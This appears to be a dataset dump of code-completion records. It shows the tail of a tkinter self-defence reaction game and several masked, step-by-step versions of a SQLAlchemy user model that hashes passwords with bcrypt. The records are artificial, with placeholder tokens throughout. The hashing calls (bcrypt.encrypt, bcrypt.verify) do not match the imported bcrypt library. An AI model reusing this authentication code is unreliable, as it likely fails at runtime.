= 0\n if difficultyChoice[0] == \"E\":\n secondsChosen = 6\n elif difficultyChoice[0] == \"M\":\n secondsChosen = 3\n else:\n secondsChosen = 1\n print(secondsChosen)\n difficultyList.pack_forget()\n\n randAssault = random.randint(0, 5)\n instructionLabel.config(text=assaultList[randAssault], font=(\"Courier\", 25))\n vidLabel.pack()\n \n predictedCounter = show_frame(secondsChosen*1000)\n \n if predictedCounter not in counterList:\n predictedCounter = counterList[random.randint(0, 6)]\n \n root.after(secondsChosen*1200, calcSuccess, predictedCounter, randAssault)\n\n return 0\n\ndef reset():\n resetButton.pack_forget()\n startButton.config(text=\"Start\")\n startButton.pack(side=BOTTOM)\n instructionLabel.config(text=instructionText, font=(\"Courier\", 16))\n descriptionLabel.config(text=descriptionText, font=(\"Courier\", 18))\n descriptionLabel.pack(side=TOP)\n difficultyList.pack(side=TOP)\n\n\nstartButton = Button(buttonFrame, bd=6, padx=20, pady=20,font=(\"Courier\", 16), text=\"Start\", fg=\"green\", command=runPrompt)\nstartButton.pack(side=BOTTOM)\nresetButton = Button(buttonFrame, bd=6, padx=20, pady=20, font=(\"Courier\", 16), text=\"Reset\", fg=\"red\", command=reset)\n \n\nroot.mainloop()\ncap.release()\n",
"step-ids": [
3,
5,
6,
7,
8
]
}
|
[
3,
5,
6,
7,
8
] |
<|reserved_special_token_0|>
class Usuario(Configuration.db.Model):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def __repr__(self):
return '<Usuario %r>' % self.id
<|reserved_special_token_0|>
def get_code(self):
return self.code
<|reserved_special_token_0|>
def get_senha(self):
return self.senha
<|reserved_special_token_0|>
def set_id(self, id):
self.id = id
<|reserved_special_token_0|>
def set_email(self, email):
self.email = email
<|reserved_special_token_0|>
def set_nome(self, nome):
self.nome = nome
def validate_password(self, senha):
return bcrypt.verify(senha, self.senha)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Usuario(Configuration.db.Model):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def __repr__(self):
return '<Usuario %r>' % self.id
def get_id(self):
return self.id
def get_code(self):
return self.code
<|reserved_special_token_0|>
def get_senha(self):
return self.senha
<|reserved_special_token_0|>
def set_id(self, id):
self.id = id
<|reserved_special_token_0|>
def set_email(self, email):
self.email = email
def set_senha(self, senha):
self.senha = bcrypt.encrypt(senha)
def set_nome(self, nome):
self.nome = nome
def validate_password(self, senha):
return bcrypt.verify(senha, self.senha)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Usuario(Configuration.db.Model):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def __repr__(self):
return '<Usuario %r>' % self.id
def get_id(self):
return self.id
def get_code(self):
return self.code
def get_email(self):
return self.email
def get_senha(self):
return self.senha
<|reserved_special_token_0|>
def set_id(self, id):
self.id = id
def set_code(self, code):
self.code = code
def set_email(self, email):
self.email = email
def set_senha(self, senha):
self.senha = bcrypt.encrypt(senha)
def set_nome(self, nome):
self.nome = nome
def validate_password(self, senha):
return bcrypt.verify(senha, self.senha)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Usuario(Configuration.db.Model):
__tablename__ = 'usuario'
id = Configuration.db.Column(Configuration.db.BIGINT, primary_key=True,
autoincrement=True)
code = Configuration.db.Column(Configuration.db.String(80), unique=True,
nullable=False)
email = Configuration.db.Column(Configuration.db.String(120), unique=
True, nullable=True)
senha = Configuration.db.Column(Configuration.db.String(300), nullable=True
)
nome = Configuration.db.Column(Configuration.db.String(100), nullable=True)
def __repr__(self):
return '<Usuario %r>' % self.id
def get_id(self):
return self.id
def get_code(self):
return self.code
def get_email(self):
return self.email
def get_senha(self):
return self.senha
def get_nome(self):
return self.nome
def set_id(self, id):
self.id = id
def set_code(self, code):
self.code = code
def set_email(self, email):
self.email = email
def set_senha(self, senha):
self.senha = bcrypt.encrypt(senha)
def set_nome(self, nome):
self.nome = nome
def validate_password(self, senha):
return bcrypt.verify(senha, self.senha)
<|reserved_special_token_1|>
import bcrypt as bcrypt
from config.configuration import Configuration
class Usuario(Configuration.db.Model):
__tablename__ = "usuario"
id = Configuration.db.Column(Configuration.db.BIGINT, primary_key=True, autoincrement=True)
code = Configuration.db.Column(Configuration.db.String(80), unique=True, nullable=False)
email = Configuration.db.Column(Configuration.db.String(120),unique=True, nullable=True)
senha = Configuration.db.Column(Configuration.db.String(300), nullable=True)
nome = Configuration.db.Column(Configuration.db.String(100), nullable=True)
def __repr__(self):
return '<Usuario %r>' % self.id
def get_id(self):
return self.id
def get_code(self):
return self.code
def get_email(self):
return self.email
def get_senha(self):
return self.senha
def get_nome(self):
return self.nome
def set_id(self,id):
self.id = id
def set_code(self,code):
self.code = code
def set_email(self,email):
self.email = email
def set_senha(self,senha):
self.senha = bcrypt.encrypt(senha)
def set_nome(self, nome):
self.nome = nome
def validate_password(self,senha):
return bcrypt.verify(senha,self.senha)
|
flexible
|
{
"blob_id": "598a0771dd1447034f2db95c67dd0dcf968f43a7",
"index": 8229,
"step-1": "<mask token>\n\n\nclass Usuario(Configuration.db.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __repr__(self):\n return '<Usuario %r>' % self.id\n <mask token>\n\n def get_code(self):\n return self.code\n <mask token>\n\n def get_senha(self):\n return self.senha\n <mask token>\n\n def set_id(self, id):\n self.id = id\n <mask token>\n\n def set_email(self, email):\n self.email = email\n <mask token>\n\n def set_nome(self, nome):\n self.nome = nome\n\n def validate_password(self, senha):\n return bcrypt.verify(senha, self.senha)\n",
"step-2": "<mask token>\n\n\nclass Usuario(Configuration.db.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __repr__(self):\n return '<Usuario %r>' % self.id\n\n def get_id(self):\n return self.id\n\n def get_code(self):\n return self.code\n <mask token>\n\n def get_senha(self):\n return self.senha\n <mask token>\n\n def set_id(self, id):\n self.id = id\n <mask token>\n\n def set_email(self, email):\n self.email = email\n\n def set_senha(self, senha):\n self.senha = bcrypt.encrypt(senha)\n\n def set_nome(self, nome):\n self.nome = nome\n\n def validate_password(self, senha):\n return bcrypt.verify(senha, self.senha)\n",
"step-3": "<mask token>\n\n\nclass Usuario(Configuration.db.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __repr__(self):\n return '<Usuario %r>' % self.id\n\n def get_id(self):\n return self.id\n\n def get_code(self):\n return self.code\n\n def get_email(self):\n return self.email\n\n def get_senha(self):\n return self.senha\n <mask token>\n\n def set_id(self, id):\n self.id = id\n\n def set_code(self, code):\n self.code = code\n\n def set_email(self, email):\n self.email = email\n\n def set_senha(self, senha):\n self.senha = bcrypt.encrypt(senha)\n\n def set_nome(self, nome):\n self.nome = nome\n\n def validate_password(self, senha):\n return bcrypt.verify(senha, self.senha)\n",
"step-4": "<mask token>\n\n\nclass Usuario(Configuration.db.Model):\n __tablename__ = 'usuario'\n id = Configuration.db.Column(Configuration.db.BIGINT, primary_key=True,\n autoincrement=True)\n code = Configuration.db.Column(Configuration.db.String(80), unique=True,\n nullable=False)\n email = Configuration.db.Column(Configuration.db.String(120), unique=\n True, nullable=True)\n senha = Configuration.db.Column(Configuration.db.String(300), nullable=True\n )\n nome = Configuration.db.Column(Configuration.db.String(100), nullable=True)\n\n def __repr__(self):\n return '<Usuario %r>' % self.id\n\n def get_id(self):\n return self.id\n\n def get_code(self):\n return self.code\n\n def get_email(self):\n return self.email\n\n def get_senha(self):\n return self.senha\n\n def get_nome(self):\n return self.nome\n\n def set_id(self, id):\n self.id = id\n\n def set_code(self, code):\n self.code = code\n\n def set_email(self, email):\n self.email = email\n\n def set_senha(self, senha):\n self.senha = bcrypt.encrypt(senha)\n\n def set_nome(self, nome):\n self.nome = nome\n\n def validate_password(self, senha):\n return bcrypt.verify(senha, self.senha)\n",
"step-5": "import bcrypt as bcrypt\n\nfrom config.configuration import Configuration\n\nclass Usuario(Configuration.db.Model):\n\n __tablename__ = \"usuario\"\n\n id = Configuration.db.Column(Configuration.db.BIGINT, primary_key=True, autoincrement=True)\n code = Configuration.db.Column(Configuration.db.String(80), unique=True, nullable=False)\n email = Configuration.db.Column(Configuration.db.String(120),unique=True, nullable=True)\n senha = Configuration.db.Column(Configuration.db.String(300), nullable=True)\n nome = Configuration.db.Column(Configuration.db.String(100), nullable=True)\n\n\n def __repr__(self):\n return '<Usuario %r>' % self.id\n\n def get_id(self):\n return self.id\n\n def get_code(self):\n return self.code\n\n def get_email(self):\n return self.email\n\n def get_senha(self):\n return self.senha\n\n def get_nome(self):\n return self.nome\n\n def set_id(self,id):\n self.id = id\n\n def set_code(self,code):\n self.code = code\n\n def set_email(self,email):\n self.email = email\n\n def set_senha(self,senha):\n self.senha = bcrypt.encrypt(senha)\n\n def set_nome(self, nome):\n self.nome = nome\n\n def validate_password(self,senha):\n return bcrypt.verify(senha,self.senha)",
"step-ids": [
8,
10,
12,
14,
16
]
}
|
[
8,
10,
12,
14,
16
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.